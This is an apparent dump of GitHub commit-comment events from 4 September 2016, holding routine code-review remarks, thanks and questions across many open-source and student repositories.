{"id":"4513811118","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"saebel/wrye-bash"},"payload":{"comment":{"id":18893218,"position":null,"line":null,"path":null,"commit_id":"96e9a7e82471e87c7540ebec5ae581c7c8bdf254","created_at":"2016-09-04T14:12:19Z","updated_at":"2016-09-04T14:12:19Z","body":"@saebel \r\n\r\nI am about to include your commit in upstream - congratulations :)\r\n\r\nI would like you however to add another commit with the edits you suggested to the `DataFileExists` here: http://forums.bethsoft.com/topic/1589330-wrye-bash-thread-107/page-6#entry25077056 - and possibly other edits you think are necessary.\r\n\r\nCould you please do that for me ? Commit it in your fork and notify me to pull it"}},"created_at":"2016-09-04T14:12:19Z"}
{"id":"4513811328","type":"CommitCommentEvent","actor":{"login":"TPS"},"repo":{"name":"jibsen/pngwolf-zopfli"},"payload":{"comment":{"id":18893219,"position":null,"line":null,"path":null,"commit_id":"7a3e6ee0add65b408a00e6dd57e3342330e12ddd","created_at":"2016-09-04T14:12:29Z","updated_at":"2016-09-04T14:12:29Z","body":"Fix for #2. ☺"}},"created_at":"2016-09-04T14:12:29Z"}
{"id":"4513811346","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893220,"position":null,"line":null,"path":null,"commit_id":"3a1a39ab701a01e506f228b64ab7081b40949225","created_at":"2016-09-04T14:12:30Z","updated_at":"2016-09-04T14:12:30Z","body":"Sounds good to me. Like the idea"}},"created_at":"2016-09-04T14:12:30Z"}
{"id":"4513812034","type":"CommitCommentEvent","actor":{"login":"s3inlc"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893221,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T14:13:00Z","updated_at":"2016-09-04T14:13:00Z","body":"Ok, the sort thing is now done with Collections in commit https://github.com/silvanheller/cineast/commit/96da5207d37b57639a481b37f5c5624dbb8b8eda\r\n\r\nI think I do this correctly, I'm using the DBSelector method 'getRows'. If this is not what you want, please tell me then."}},"created_at":"2016-09-04T14:13:00Z"}
{"id":"4513813289","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"cherifyass/android_device_lge_hammerhead"},"payload":{"comment":{"id":18893226,"position":null,"line":null,"path":null,"commit_id":"1cb3c619286e2edaceb068466fc8c5d4159d7f1c","created_at":"2016-09-04T14:13:54Z","updated_at":"2016-09-04T14:13:54Z","body":"@cherifyass \r\nVery useful information) Thank you!"}},"created_at":"2016-09-04T14:13:54Z"}
{"id":"4513818136","type":"CommitCommentEvent","actor":{"login":"evilaliv3"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893229,"position":13,"line":421,"path":"backend/globaleaks/db/sqlite.sql","commit_id":"b27bc6d27e4a6ca75585cb9e48a27a27d61db4e0","created_at":"2016-09-04T14:17:25Z","updated_at":"2016-09-04T14:17:25Z","body":"going to fix it, thanks"}},"created_at":"2016-09-04T14:17:25Z"}
{"id":"4513820339","type":"CommitCommentEvent","actor":{"login":"qiaokang0"},"repo":{"name":"qiaokang0/hello-world"},"payload":{"comment":{"id":18893231,"position":null,"line":null,"path":null,"commit_id":"beb7fbcd3bc8e2a464cbb45a82f0796c6c0b5aa2","created_at":"2016-09-04T14:19:03Z","updated_at":"2016-09-04T14:19:03Z","body":"first use"}},"created_at":"2016-09-04T14:19:03Z"}
{"id":"4513821949","type":"CommitCommentEvent","actor":{"login":"TPS"},"repo":{"name":"svn2github/nikkhokkho"},"payload":{"comment":{"id":18893232,"position":null,"line":null,"path":null,"commit_id":"5243327a397d9fd593895f067281d0be33be3bf5","created_at":"2016-09-04T14:20:11Z","updated_at":"2016-09-04T14:20:11Z","body":"Solves https://github.com/javiergutierrezchamorro/nikkhokkho/issues/9#issuecomment-243999006. ☺"}},"created_at":"2016-09-04T14:20:11Z"}
{"id":"4513822345","type":"CommitCommentEvent","actor":{"login":"frol9999"},"repo":{"name":"frol9999/player"},"payload":{"comment":{"id":18893233,"position":null,"line":null,"path":null,"commit_id":"af808af315e27c7ff037c024a156deb6be7d9583","created_at":"2016-09-04T14:20:26Z","updated_at":"2016-09-04T14:20:26Z","body":"![2016-09-04_19-19-45](https://cloud.githubusercontent.com/assets/13469345/18231499/9beb58dc-72d4-11e6-85ef-960f2a1c0f4b.png)\r\n"}},"created_at":"2016-09-04T14:20:26Z"}
{"id":"4513822847","type":"CommitCommentEvent","actor":{"login":"frol9999"},"repo":{"name":"frol9999/player"},"payload":{"comment":{"id":18893234,"position":null,"line":null,"path":null,"commit_id":"af808af315e27c7ff037c024a156deb6be7d9583","created_at":"2016-09-04T14:20:51Z","updated_at":"2016-09-04T14:20:51Z","body":"![2016-09-04_19-17-36](https://cloud.githubusercontent.com/assets/13469345/18231500/af0e23fe-72d4-11e6-96a5-ffc9b0481f75.png)\r\n"}},"created_at":"2016-09-04T14:20:51Z"}
{"id":"4513823484","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18893235,"position":null,"line":null,"path":null,"commit_id":"45c9f9e121a4f860ee4cff867467ffa3fb4bc434","created_at":"2016-09-04T14:21:19Z","updated_at":"2016-09-04T14:21:19Z","body":"Did #23 "}},"created_at":"2016-09-04T14:21:19Z"}
{"id":"4513824202","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893237,"position":7,"line":95,"path":"backend/globaleaks/handlers/admin/overview.py","commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T14:21:49Z","updated_at":"2016-09-04T14:21:49Z","body":"@evilaliv3 can you add the name of the KWARG that you are assigning with the 3rd parameter here. \r\n\r\nThere is the function [`store.using` as well.](http://people.canonical.com/~therve/storm/storm.store.Store.html#using)"}},"created_at":"2016-09-04T14:21:49Z"}
{"id":"4513824343","type":"CommitCommentEvent","actor":{"login":"frol9999"},"repo":{"name":"frol9999/player"},"payload":{"comment":{"id":18893238,"position":null,"line":null,"path":null,"commit_id":"af808af315e27c7ff037c024a156deb6be7d9583","created_at":"2016-09-04T14:21:55Z","updated_at":"2016-09-04T14:21:55Z","body":"## it-plast player"}},"created_at":"2016-09-04T14:21:55Z"}
{"id":"4513824550","type":"CommitCommentEvent","actor":{"login":"giselanggit"},"repo":{"name":"giselanggit/ASD_Task_1"},"payload":{"comment":{"id":18893239,"position":2,"line":108,"path":"asd_task_1.cpp","commit_id":"5ba2064b6607b020c9d0cfdf9bd3eabdef32291d","created_at":"2016-09-04T14:22:01Z","updated_at":"2016-09-04T14:22:01Z","body":"xx"}},"created_at":"2016-09-04T14:22:01Z"}
{"id":"4513824908","type":"CommitCommentEvent","actor":{"login":"silvanheller"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893240,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T14:22:17Z","updated_at":"2016-09-04T14:22:17Z","body":"@s3inlc \r\nNew Code should be \r\n`\r\nShotLookup sl = new ShotLookup();\r\n`\r\n`\r\nList<ShotDescriptor> descriptors =  sl.lookUpVideo(String videoId);\r\n`\r\nAnd a shotDescriptor has everything you need."}},"created_at":"2016-09-04T14:22:17Z"}
{"id":"4513825489","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18893243,"position":null,"line":null,"path":null,"commit_id":"a575b6aa92108898a709df13a7bba208c170a16a","created_at":"2016-09-04T14:22:44Z","updated_at":"2016-09-04T14:22:44Z","body":"Did #21 and #22 "}},"created_at":"2016-09-04T14:22:44Z"}
{"id":"4513825957","type":"CommitCommentEvent","actor":{"login":"liushengzu"},"repo":{"name":"liushengzu/hello"},"payload":{"comment":{"id":18893244,"position":null,"line":null,"path":null,"commit_id":"ce06382b21b0d1e0c009c5651676db5586189436","created_at":"2016-09-04T14:23:08Z","updated_at":"2016-09-04T14:23:08Z","body":"my name "}},"created_at":"2016-09-04T14:23:08Z"}
{"id":"4513827014","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893245,"position":7,"line":95,"path":"backend/globaleaks/handlers/admin/overview.py","commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T14:23:59Z","updated_at":"2016-09-04T14:23:59Z","body":"Yes, I think following the example they have in the docs is the best approach.\r\n\r\n```\r\njoin = LeftJoin(models.ReceiverTip.receiver_id == receiver.id)\r\nstore.using(models.ReceiverTip, join).find(. . .)\r\n```"}},"created_at":"2016-09-04T14:23:59Z"}
{"id":"4513828240","type":"CommitCommentEvent","actor":{"login":"edwinyoo44"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893246,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T14:24:57Z","updated_at":"2016-09-04T14:24:57Z","body":"I think this not good......"}},"created_at":"2016-09-04T14:24:57Z"}
{"id":"4513828829","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893247,"position":11,"line":123,"path":"backend/globaleaks/handlers/rtip.py","commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T14:25:23Z","updated_at":"2016-09-04T14:25:23Z","body":"@evilaliv3 are these expressions in tuples evaluated like a series of `AND`s?"}},"created_at":"2016-09-04T14:25:23Z"}
{"id":"4513829714","type":"CommitCommentEvent","actor":{"login":"kularny"},"repo":{"name":"DirtyUnicorns/android_vendor_du"},"payload":{"comment":{"id":18893248,"position":null,"line":null,"path":null,"commit_id":"8cf0dc67b0479f7053a7b1675d7e9a6d91f049f6","created_at":"2016-09-04T14:26:01Z","updated_at":"2016-09-04T14:26:01Z","body":"Lol alex...u once hammered me for authorship over an _ last year :-p    btw i was kidding...didnt u gonna slam me so hard ;-)"}},"created_at":"2016-09-04T14:26:01Z"}
{"id":"4513830521","type":"CommitCommentEvent","actor":{"login":"jarakava"},"repo":{"name":"chrizzzzz/LEDDisplay74HC595"},"payload":{"comment":{"id":18893249,"position":null,"line":null,"path":null,"commit_id":"6e0d9094a588c35fe5331d4955e9740d51b443b5","created_at":"2016-09-04T14:26:39Z","updated_at":"2016-09-04T14:26:39Z","body":"Hello, I would like to use the 4-digit display with 4 PCs 74HC595 with resistors in static mode. I tried to modify Your code but not success. Maybe You have this code. Can You help me, please? \r\nJerry \r\ntime@email.cz\r\n "}},"created_at":"2016-09-04T14:26:39Z"}
{"id":"4513830539","type":"CommitCommentEvent","actor":{"login":"gustavoboiuna"},"repo":{"name":"gustavoboiuna/EDL"},"payload":{"comment":{"id":18893250,"position":null,"line":null,"path":null,"commit_id":"4d5cd1bc698e6524f7afb9a5af01d3a83244c7be","created_at":"2016-09-04T14:26:40Z","updated_at":"2016-09-04T14:26:40Z","body":"Um pouco. Eu inventei de fazer no Windows e acabei dando uma volta totalmente desnecessária."}},"created_at":"2016-09-04T14:26:40Z"}
{"id":"4513833055","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893251,"position":null,"line":null,"path":null,"commit_id":"2cb425cb48fab3911c9c283634002926b1410120","created_at":"2016-09-04T14:28:40Z","updated_at":"2016-09-04T14:28:40Z","body":"Less code; more better"}},"created_at":"2016-09-04T14:28:40Z"}
{"id":"4513834195","type":"CommitCommentEvent","actor":{"login":"gaisei"},"repo":{"name":"gaisei/dokushu"},"payload":{"comment":{"id":18893253,"position":null,"line":null,"path":null,"commit_id":"d0e1339602276f8416fa033e99a50d96da006ff9","created_at":"2016-09-04T14:29:33Z","updated_at":"2016-09-04T14:29:33Z","body":"著者を追加した"}},"created_at":"2016-09-04T14:29:33Z"}
{"id":"4513834299","type":"CommitCommentEvent","actor":{"login":"cyf123456"},"repo":{"name":"cyf123456/o2o"},"payload":{"comment":{"id":18893254,"position":null,"line":null,"path":null,"commit_id":"4e3bad425bb813a53da762d77f4c99e19f6a7756","created_at":"2016-09-04T14:29:38Z","updated_at":"2016-09-04T14:29:38Z","body":"dag"}},"created_at":"2016-09-04T14:29:38Z"}
{"id":"4513835059","type":"CommitCommentEvent","actor":{"login":"s3inlc"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893256,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T14:30:10Z","updated_at":"2016-09-04T14:30:10Z","body":"thanks @silvanheller \r\n\r\nBut which method on the ShotDescriptor gives me the sequence number?"}},"created_at":"2016-09-04T14:30:10Z"}
{"id":"4513835220","type":"CommitCommentEvent","actor":{"login":"wenkhairu"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18893257,"position":null,"line":null,"path":null,"commit_id":"5d7519929eb987c6a5418d39e5bbd8faa15b5aa5","created_at":"2016-09-04T14:30:15Z","updated_at":"2016-09-04T14:30:15Z","body":"unable to save player, saveAllPlayer is not a function"}},"created_at":"2016-09-04T14:30:15Z"}
{"id":"4513836458","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18893258,"position":null,"line":null,"path":null,"commit_id":"034c7f431f9de7d78627df394d44bedcbb8c2c2c","created_at":"2016-09-04T14:30:53Z","updated_at":"2016-09-04T14:30:53Z","body":"@SubJunk Yes i agree :wink: \r\nFormulation is a true dilemne for me, i'm never satisfact of mine :-(\r\n\r\nDone."}},"created_at":"2016-09-04T14:30:53Z"}
{"id":"4513837497","type":"CommitCommentEvent","actor":{"login":"NSkelsey"},"repo":{"name":"globaleaks/GlobaLeaks"},"payload":{"comment":{"id":18893259,"position":15,"line":72,"path":"backend/globaleaks/models/__init__.py","commit_id":"9f6d47070d0ed4199b5ccb234ac4fec84878fff0","created_at":"2016-09-04T14:31:34Z","updated_at":"2016-09-04T14:31:34Z","body":"Gooooooooooooooood"}},"created_at":"2016-09-04T14:31:34Z"}
{"id":"4513837513","type":"CommitCommentEvent","actor":{"login":"karthick111"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18893260,"position":null,"line":null,"path":null,"commit_id":"d56b586d85fc07fc4a7d15b88f970a33ae3e7152","created_at":"2016-09-04T14:31:36Z","updated_at":"2016-09-04T14:31:36Z","body":"wew"}},"created_at":"2016-09-04T14:31:36Z"}
{"id":"4513838796","type":"CommitCommentEvent","actor":{"login":"aididhaiqal"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18893261,"position":null,"line":null,"path":null,"commit_id":"5d7519929eb987c6a5418d39e5bbd8faa15b5aa5","created_at":"2016-09-04T14:32:27Z","updated_at":"2016-09-04T14:32:27Z","body":"@wenkhairu Not an issue,Its not yet being implement"}},"created_at":"2016-09-04T14:32:27Z"}
{"id":"4513840966","type":"CommitCommentEvent","actor":{"login":"wenkhairu"},"repo":{"name":"maierfelix/POGOserver"},"payload":{"comment":{"id":18893264,"position":null,"line":null,"path":null,"commit_id":"5d7519929eb987c6a5418d39e5bbd8faa15b5aa5","created_at":"2016-09-04T14:34:00Z","updated_at":"2016-09-04T14:34:00Z","body":"yeah i know that :) hope soon that will be added :)"}},"created_at":"2016-09-04T14:34:00Z"}
{"id":"4513841257","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18893265,"position":null,"line":null,"path":null,"commit_id":"aec7a3ed85a04f30b9d72b70142777864949ca9e","created_at":"2016-09-04T14:34:12Z","updated_at":"2016-09-04T14:34:12Z","body":"@edwinyoo44 it's been moved back into DevTools where it belongs."}},"created_at":"2016-09-04T14:34:12Z"}
{"id":"4513843029","type":"CommitCommentEvent","actor":{"login":"ortichon"},"repo":{"name":"Kibibit/eslint-plugin-kibibit"},"payload":{"comment":{"id":18893268,"position":null,"line":null,"path":null,"commit_id":"2d13049746552536ce02b8f67056f275797529a1","created_at":"2016-09-04T14:35:26Z","updated_at":"2016-09-04T14:35:26Z","body":"pshhh, looks like an \"Active\" github account :wink: "}},"created_at":"2016-09-04T14:35:26Z"}
{"id":"4513845589","type":"CommitCommentEvent","actor":{"login":"thitiboy"},"repo":{"name":"DunstleOS/openkore"},"payload":{"comment":{"id":18893271,"position":null,"line":null,"path":null,"commit_id":"b7b833705f92dea125a29f3dcbd6403369f3fe65","created_at":"2016-09-04T14:37:22Z","updated_at":"2016-09-04T14:37:22Z","body":"ขอติดตามผลงานนะครับ"}},"created_at":"2016-09-04T14:37:22Z"}
{"id":"4513846500","type":"CommitCommentEvent","actor":{"login":"tatsuhiro-t"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18893272,"position":null,"line":null,"path":null,"commit_id":"152e5c2105aa6b4701923b11096fcc30284ea848","created_at":"2016-09-04T14:38:00Z","updated_at":"2016-09-04T14:38:00Z","body":"The workaround for older Xcode landed into nghttp2 master.  It will be available in the next release."}},"created_at":"2016-09-04T14:38:00Z"}
{"id":"4513851377","type":"CommitCommentEvent","actor":{"login":"sp41mer"},"repo":{"name":"ahmdrz/Instagram-API-python"},"payload":{"comment":{"id":18893275,"position":null,"line":null,"path":null,"commit_id":"166ead4e30471e1cac968c5d5592374b2dcf8f53","created_at":"2016-09-04T14:41:25Z","updated_at":"2016-09-04T14:41:25Z","body":"I've checked now.\r\nSometimes 'next_max_id' value is string like 'AaaaBssJKshdhsQWjsdkk...', but not '200', '400'.\r\nBut sometimes it's works right.\r\nI've fixed it with changing \r\nnext_max_id = ''\r\nto \r\nnext_max_id = 0"}},"created_at":"2016-09-04T14:41:25Z"}
{"id":"4513851894","type":"CommitCommentEvent","actor":{"login":"neskk"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18893276,"position":null,"line":null,"path":null,"commit_id":"ed1ee704321450aa7d05af42e1e2f3e55a0cf708","created_at":"2016-09-04T14:41:47Z","updated_at":"2016-09-04T14:41:47Z","body":"Does this work well with reading accounts from the .csv?\r\nI'm guessing that we need a different csv for each instance if we want multiple instances, which ends up not being useful...\r\nIt would be great if each instance wrote a tag in the csv telling which accounts it's using."}},"created_at":"2016-09-04T14:41:47Z"}
{"id":"4513852139","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"juliendubrail/julien_spices"},"payload":{"comment":{"id":18893278,"position":null,"line":null,"path":null,"commit_id":"74291638a0e9c7daf07f9ab85ee9deef786feae3","created_at":"2016-09-04T14:41:58Z","updated_at":"2016-09-04T14:41:58Z","body":"LGTM"}},"created_at":"2016-09-04T14:41:58Z"}
{"id":"4513853695","type":"CommitCommentEvent","actor":{"login":"ValeriyVell"},"repo":{"name":"ValeriyVell/ValeriyVell.github.io"},"payload":{"comment":{"id":18893281,"position":null,"line":null,"path":null,"commit_id":"b81dd9757d5391eadc37e1cc72f7ca473f282ca8","created_at":"2016-09-04T14:43:06Z","updated_at":"2016-09-04T14:43:06Z","body":"1"}},"created_at":"2016-09-04T14:43:06Z"}
{"id":"4513853971","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":18893282,"position":13,"line":13,"path":"wk1/day5/Excercise1.js","commit_id":"0e5d1574ea1f3b5161e0c753da99f8f872a3ffdc","created_at":"2016-09-04T14:43:16Z","updated_at":"2016-09-04T14:43:16Z","body":"Since the `Rectangle` constructor will end up setting the `width` and `height` properties on `this`, you could omit lines 11 and 12."}},"created_at":"2016-09-04T14:43:16Z"}
{"id":"4513857358","type":"CommitCommentEvent","actor":{"login":"hcspidergrasp"},"repo":{"name":"Kseniya737/Diploma"},"payload":{"comment":{"id":18893283,"position":null,"line":null,"path":null,"commit_id":"0ff58c05fa43ea91a59bc49856bb7abcb962c4a1","created_at":"2016-09-04T14:45:39Z","updated_at":"2016-09-04T14:45:39Z","body":"Rest in peace, sweet diplome! You were like a father to me :'-("}},"created_at":"2016-09-04T14:45:39Z"}
{"id":"4513858444","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18893284,"position":null,"line":null,"path":null,"commit_id":"a7eb90f3f6e269070ef389331ac9f4f0c308cb6d","created_at":"2016-09-04T14:46:23Z","updated_at":"2016-09-04T14:46:23Z","body":"Did #24 "}},"created_at":"2016-09-04T14:46:23Z"}
{"id":"4513859047","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"Angizd/A.zobarandiez"},"payload":{"comment":{"id":18893286,"position":null,"line":null,"path":null,"commit_id":"79769b45bc492fefaa9dbf468511e3e9d8909cf6","created_at":"2016-09-04T14:46:47Z","updated_at":"2016-09-04T14:46:47Z","body":"The js looks good to me except for the indentation in the `invertCase` function."}},"created_at":"2016-09-04T14:46:47Z"}
{"id":"4513860178","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18893287,"position":null,"line":null,"path":null,"commit_id":"66a89f36ec355070115ceec4c43c6fc1125c8c5e","created_at":"2016-09-04T14:47:36Z","updated_at":"2016-09-04T14:47:36Z","body":"LGTM"}},"created_at":"2016-09-04T14:47:36Z"}
{"id":"4513860784","type":"CommitCommentEvent","actor":{"login":"ratoaq2"},"repo":{"name":"pymedusa/SickRage"},"payload":{"comment":{"id":18893288,"position":null,"line":null,"path":null,"commit_id":"8d56c69ea7fa200d97d4051e62dcfac191118f63","created_at":"2016-09-04T14:48:04Z","updated_at":"2016-09-04T14:48:04Z","body":"that way we're just duplicating more code, right?"}},"created_at":"2016-09-04T14:48:04Z"}
{"id":"4513860986","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18893289,"position":5,"line":5,"path":"wk1/day5/W1D5_exer1.js","commit_id":"e51b212b686e416a83a302c2e1337e6430438b33","created_at":"2016-09-04T14:48:11Z","updated_at":"2016-09-04T14:48:11Z","body":"No need for parentheses in this line"}},"created_at":"2016-09-04T14:48:11Z"}
{"id":"4513861722","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18893292,"position":14,"line":14,"path":"wk1/day5/W1D5_exer2.js","commit_id":"e51b212b686e416a83a302c2e1337e6430438b33","created_at":"2016-09-04T14:48:47Z","updated_at":"2016-09-04T14:48:47Z","body":"No need for parentheses in this line."}},"created_at":"2016-09-04T14:48:47Z"}
{"id":"4513861842","type":"CommitCommentEvent","actor":{"login":"fernandog"},"repo":{"name":"pymedusa/SickRage"},"payload":{"comment":{"id":18893293,"position":null,"line":null,"path":null,"commit_id":"8d56c69ea7fa200d97d4051e62dcfac191118f63","created_at":"2016-09-04T14:48:52Z","updated_at":"2016-09-04T14:48:52Z","body":"read PR body =)"}},"created_at":"2016-09-04T14:48:52Z"}
{"id":"4513862678","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18893294,"position":null,"line":null,"path":null,"commit_id":"cbb654d98a97de577ef6afcfb85bde2fe2e761da","created_at":"2016-09-04T14:49:30Z","updated_at":"2016-09-04T14:49:30Z","body":"Contact @udeved for that. I don't know how it should be designed in general. Maybe he has something already in mind for that matter ..."}},"created_at":"2016-09-04T14:49:30Z"}
{"id":"4513863995","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18893296,"position":28,"line":28,"path":"wk1/day5/W1D5_exer2.js","commit_id":"e51b212b686e416a83a302c2e1337e6430438b33","created_at":"2016-09-04T14:50:24Z","updated_at":"2016-09-04T14:50:24Z","body":"Wow!"}},"created_at":"2016-09-04T14:50:24Z"}
{"id":"4513864719","type":"CommitCommentEvent","actor":{"login":"Taapat"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18893297,"position":158,"line":207,"path":"src/serviceapp/serviceapp.cpp","commit_id":"761bb5f2048a2e983b7dc9fb1bc31de7e53471df","created_at":"2016-09-04T14:50:56Z","updated_at":"2016-09-04T14:50:56Z","body":"I think that there should be:\r\nif (!m_subservice_vec.size() )\r\n\r\nOr the string size may be less than 0?"}},"created_at":"2016-09-04T14:50:56Z"}
{"id":"4513864942","type":"CommitCommentEvent","actor":{"login":"jagerman"},"repo":{"name":"pybind/pybind11"},"payload":{"comment":{"id":18893298,"position":null,"line":null,"path":null,"commit_id":"f3be07c6613c8463a2faea12806dcd1bd788caf9","created_at":"2016-09-04T14:51:03Z","updated_at":"2016-09-04T14:51:03Z","body":"One more (causing a style check failure) on line 245."}},"created_at":"2016-09-04T14:51:03Z"}
{"id":"4513865499","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk1"},"payload":{"comment":{"id":18893299,"position":4,"line":4,"path":"invert.js","commit_id":"9cea6833a2f2005a633ccabc57bc8d45fe965d03","created_at":"2016-09-04T14:51:24Z","updated_at":"2016-09-04T14:51:24Z","body":"There no need for parentheses around `letter === letter.toUpperCase()`"}},"created_at":"2016-09-04T14:51:24Z"}
{"id":"4513866879","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk1"},"payload":{"comment":{"id":18893301,"position":19,"line":19,"path":"rectangle.js","commit_id":"9cea6833a2f2005a633ccabc57bc8d45fe965d03","created_at":"2016-09-04T14:52:25Z","updated_at":"2016-09-04T14:52:25Z","body":"Wow, two for the price of one!"}},"created_at":"2016-09-04T14:52:25Z"}
{"id":"4513867325","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/practice_challenges"},"payload":{"comment":{"id":18893302,"position":16,"line":9,"path":"challenge_5/book.rb","commit_id":"86f3b474c2f32dfd178f4845dc10e5344ae7432f","created_at":"2016-09-04T14:52:43Z","updated_at":"2016-09-04T14:52:43Z","body":"This is a BIG step backwards. Right now you can just creat one kind of book. The book title, author, etc in the challenge is just an example. "}},"created_at":"2016-09-04T14:52:43Z"}
{"id":"4513867803","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk1"},"payload":{"comment":{"id":18893303,"position":5,"line":5,"path":"rectangle.js","commit_id":"9cea6833a2f2005a633ccabc57bc8d45fe965d03","created_at":"2016-09-04T14:53:08Z","updated_at":"2016-09-04T14:53:08Z","body":"Logging it is fine, but this function should return the area as well"}},"created_at":"2016-09-04T14:53:08Z"}
{"id":"4513868686","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18893304,"position":null,"line":null,"path":null,"commit_id":"50c7abd78edcc1f0174b553dc4e1b4f1c777cd4b","created_at":"2016-09-04T14:53:43Z","updated_at":"2016-09-04T14:53:43Z","body":"LGTM"}},"created_at":"2016-09-04T14:53:43Z"}
{"id":"4513869826","type":"CommitCommentEvent","actor":{"login":"neofung"},"repo":{"name":"lyroge/wechat_sdk"},"payload":{"comment":{"id":18893308,"position":39,"line":48,"path":"README.rst","commit_id":"b18974957be702302c564f9ddfff0cae4c78c710","created_at":"2016-09-04T14:54:30Z","updated_at":"2016-09-04T14:54:30Z","body":"回复用户的时候，to_user是接收的时候的from_user,from_user 是接收的时候的to_user"}},"created_at":"2016-09-04T14:54:30Z"}
{"id":"4513869894","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"jaels/school"},"payload":{"comment":{"id":18893309,"position":3,"line":3,"path":"wk1/day5js/exercise2.js","commit_id":"610f2e72cb19e4daf4521c28afceaadab0ddcc72","created_at":"2016-09-04T14:54:32Z","updated_at":"2016-09-04T14:54:32Z","body":"You should line break and indent after `}`"}},"created_at":"2016-09-04T14:54:32Z"}
{"id":"4513871482","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18893311,"position":16,"line":16,"path":"wk1/day5ex1.js","commit_id":"60710a984976abef121ff35b2d663dafc2545e8a","created_at":"2016-09-04T14:55:40Z","updated_at":"2016-09-04T14:55:40Z","body":"There's no need for parentheses in this line"}},"created_at":"2016-09-04T14:55:40Z"}
{"id":"4513873176","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"thiloo/code"},"payload":{"comment":{"id":18893314,"position":25,"line":25,"path":"wk1/day5ex1.js","commit_id":"60710a984976abef121ff35b2d663dafc2545e8a","created_at":"2016-09-04T14:56:53Z","updated_at":"2016-09-04T14:56:53Z","body":"We wanted this multiplication to be written only once and for it to be reused by square instances. There are multiple ways to accomplish this."}},"created_at":"2016-09-04T14:56:53Z"}
{"id":"4513873961","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":18893315,"position":14,"line":26,"path":"src/org/vitrivr/cineast/core/util/ArtUtil.java","commit_id":"8ab630d925c5c2b4e2a126ad17e576cd2b3814f6","created_at":"2016-09-04T14:57:26Z","updated_at":"2016-09-04T14:57:26Z","body":"Currently none. I will add this in the new version. In the meantime you can just sort sort by the id strings."}},"created_at":"2016-09-04T14:57:26Z"}
